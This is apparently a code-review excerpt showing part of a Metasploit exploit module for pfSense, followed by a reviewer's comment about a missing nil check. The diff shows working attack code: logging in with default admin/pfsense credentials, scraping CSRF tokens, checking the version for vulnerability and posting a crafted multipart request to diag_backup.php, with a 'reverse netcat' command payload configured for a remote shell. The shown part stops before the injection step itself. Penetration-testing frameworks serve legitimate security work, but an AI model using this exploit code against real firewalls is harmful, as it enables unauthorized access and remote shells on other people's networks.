modules/exploits/unix/http/pfsense_config_data_exec.rb

```diff
@@ -0,0 +1,174 @@
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'reverse netcat'
+              }
+          },
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+                       OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+                       OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
+                     ]
+
+  end
+
+
+  def check
+    csrf = get_csrf('index.php', nil, 'GET')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'index.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld' => datastore['USERNAME'],
+        'passwordfld' => datastore['PASSWORD'],
+        'login' => ''
+      }
+    )
+
+    @auth_cookies = res.get_cookies
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'diag_backup.php'),
+      'method' => 'GET',
+      'cookie' => @auth_cookies
+    )
+
+    /Diagnostics: (?<backup>)/m =~ res.body
+    if backup and detect_version() != '2.7.0-RELEASE'
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def detect_version
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET',
+      'cookie' => @auth_cookies
+    )
+
+    /Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
+
+    return version
+  end
+
+  def get_csrf(uri, cookies, methods)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + uri),
+      'method' => methods,
+      'cookie' => cookies
+    )
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+
+    return csrf
+  end
+
+  def drop_config
+    csrf = get_csrf('diag_backup.php', @auth_cookies, 'GET')
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, "form-data; name=\"__csrf_magic\"")
+    post_data.add_part("rrddata", nil, nil, "form-data; name=\"backuparea\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"encrypt_password\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"encrypt_password_confirm\"")
+    post_data.add_part("Download configuration as XML", nil, nil, "form-data; name=\"download\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"restorearea\"")
+    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"conffile\"")
+    post_data.add_part("", nil, nil, "form-data; name=\"decrypt_password\"")
+
+
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'diag_backup.php'),
+      'method' => 'POST',
+      'cookie' => @auth_cookies,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+
+    return res.body

```

Comment:
This will crash if `res` is nil. You could use the `&` nil-safe operator - but it would probably be a good idea to add a `nil` check here instead.